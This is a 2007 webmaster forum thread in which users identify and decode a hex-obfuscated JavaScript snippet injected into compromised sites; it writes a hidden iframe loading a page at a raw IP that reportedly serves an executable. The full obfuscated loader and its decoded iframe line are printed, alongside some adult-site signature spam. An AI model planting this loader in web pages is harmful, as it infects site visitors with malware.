Hackers injecting code into sites - GoFuckYourself.com

halfpint · 12-04-2007, 03:10 PM

How do they do this and does anybody know what this script actually does, is it hijacking traffic?

Code:

<script> var s='3C696672616D65207372633D22687474703A2F2F3230332E3132312E36392E392F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o='; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); ; o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

TheSenator · 12-04-2007, 03:14 PM

I got my shit jacked ....but caught it early.

It was doing some crazy pop-up that went to AFF.

G-Rotica · 12-04-2007, 03:16 PM

Hackers should all be shot.

halfpint · 12-04-2007, 03:18 PM

Quote:

Originally Posted by TheSenator

I got my shit jacked ....but caught it early.

It was doing some crazy pop-up that went to AFF.

Did it go to an AFF affliates page or just a AFF landing page?

StuartD · 12-04-2007, 03:19 PM

That translates to this:

<iframe src="http://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

Therefore, it's loading an iframe onto your page and load the contents of that url into it.

halfpint · 12-04-2007, 03:21 PM

The funny thing with this one is Firefox did not pick it up nor did the owners own browser so he did not know until somebody else told him that it was trying to install some java application onto his browser

halfpint · 12-04-2007, 03:22 PM

Quote:

Originally Posted by StuartD

That translates to this:

<iframe src="http://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

Therefore, it's loading an iframe onto your page and load the contents of that url into it.

Thanks.... what a bunch of assholes they are basicaly stealing traffic then

CurrentlySober · 12-04-2007, 03:40 PM

Quote:

Originally Posted by halfpint

The funny thing with this one is Firefox did not pick it up nor did the owners own browser so he did not know until somebody else told him that it was trying to install some java application onto his browser

Yeah, those things dnt effect firefox
I think its something to do with scripts not being turned on by default in FF but they are in ie...

However that's what i heard. Im not stating it as absolute fact

halfpint · 12-04-2007, 03:53 PM

Quote:

Originally Posted by ThatGuyInTheCorner

Yeah, those things dnt effect firefox
I think its something to do with scripts not being turned on by default in FF but they are in ie...

However that's what i heard. Im not stating it as absolute fact

I know it did not come up when using Firefox but when using EI7 it picked it and gave a warning saying it wanted to install a java aplication and that it had a certificate from java saying it was verified. Wonder how many people are having this installed onto thier firefox browsers without realising it

SmokeyTheBear · 12-04-2007, 04:34 PM

Quote:

Originally Posted by ThatGuyInTheCorner

Yeah, those things dnt effect firefox
I think its something to do with scripts not being turned on by default in FF but they are in ie...

the script will affect firefox just the same as ie..

firefox comes with javascript turned on by default.

and even if it didn't ,surfing without javascript would be almost useless

so the iframe will be displayed on most browsers, whats in the iframe may only affect ie or may only affect firefox.

Quickdraw · 12-04-2007, 04:40 PM

Quote:

Originally Posted by StuartD

That translates to this:

<iframe src="hxxp://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

Therefore, it's loading an iframe onto your page and load the contents of that url into it.

I think you may be 1 digit off on that ip, 203 vs. 201.

203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php

This seems to be a popular subject today. Looks like quite a few have been hit.

halfpint · 12-04-2007, 04:47 PM

Quote:

Originally Posted by Quickdraw

I think you may be 1 digit off on that ip, 203 vs. 201.

203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php

This seems to be a popular subject today. Looks like quite a few have been hit.

It wasent just one site it was a network of sites

V_RocKs · 12-04-2007, 04:50 PM

Keep your network secure...

halfpint · 12-04-2007, 04:56 PM

Quote:

Originally Posted by V_RocKs

Keep your network secure...

Its not mine I just happened to stumble upon it while doing some link trades so I Let the webmaster know about it and am glad to say he sorted it pretty quickly and also said he was going to tighten his security.

I learned my lesson when they hacked my site and deleted it lol

yumma · 12-04-2007, 05:58 PM

haha, matrix has you too ;)

StuartD · 12-04-2007, 06:08 PM

Quote:

Originally Posted by Quickdraw

I think you may be 1 digit off on that ip, 203 vs. 201.

203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php

This seems to be a popular subject today. Looks like quite a few have been hit.

Entirely possible. I put it into an alert to see it's output, and hand typed out what I saw, so I probably got some part of it wrong.

Shocking · 12-04-2007, 06:13 PM

it is actually risky to try to find out what that code do!

StuartD · 12-04-2007, 06:15 PM

Quote:

Originally Posted by Shocking

it is actually risky to try to find out what that code do!

Not really. Not if you know what you're doing anyway.

ladida · 12-04-2007, 07:13 PM

It's funny when you get that shit replicating through the whole network from a file that acts as a shell, and it's all automated. Russians pwn at these things.

12-04-2007, 03:14 PM	#2
TheSenator Too lazy to set a custom title Industry Role: Join Date: Feb 2003 Location: NJ Posts: 13,331	I got my shit jacked ....but caught it early. It was doing some crazy pop-up that went to AFF. __________________ ISeekGirls.com since 2005

12-04-2007, 03:16 PM	#3
G-Rotica Confirmed User Industry Role: Join Date: Aug 2005 Location: Austin, TX Posts: 4,258	Hackers should all be shot. __________________

12-04-2007, 03:19 PM	#5
StuartD Sofa King Band Join Date: Jul 2002 Location: Outside the box Posts: 29,903	That translates to this: <iframe src="http://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe> Therefore, it's loading an iframe onto your page and load the contents of that url into it. __________________ This is me on facebook This is me on twitter

12-04-2007, 03:21 PM	#6
halfpint GFY's Halfpint Industry Role: Join Date: Jun 2007 Location: UK Posts: 15,223	The funny thing with this one is Firefox did not pick it up nor did the owners own browser so he did not know until somebody else told him that it was trying to install some java application onto his browser __________________ Get FREE website listings on Cryptocoinshops.net

12-04-2007, 05:58 PM	#15
yumma Confirmed User Join Date: Jul 2007 Posts: 579	haha, matrix has you too ;) __________________ naked teens finger bang big ass babes ass fucking

12-04-2007, 04:50 PM	#13
V_RocKs Damn Right I Kiss Ass! Industry Role: Join Date: Dec 2003 Location: Cowtown, USA Posts: 32,391	Keep your network secure...

12-04-2007, 06:13 PM	#17
Shocking Confirmed User Join Date: Feb 2006 Location: Panama Posts: 523	it is actually risky to try to find out what that code do! __________________ Web Design, Programming and much more! Complete Mobile Solutions 199-428-702

12-04-2007, 07:13 PM	#19
ladida Confirmed User Join Date: Nov 2005 Posts: 2,167	It's funny when you get that shit replicating through the whole network from a file that acts as a shell, and it's all automated. Russians pwn at these things. __________________ agentGFY at gmail.com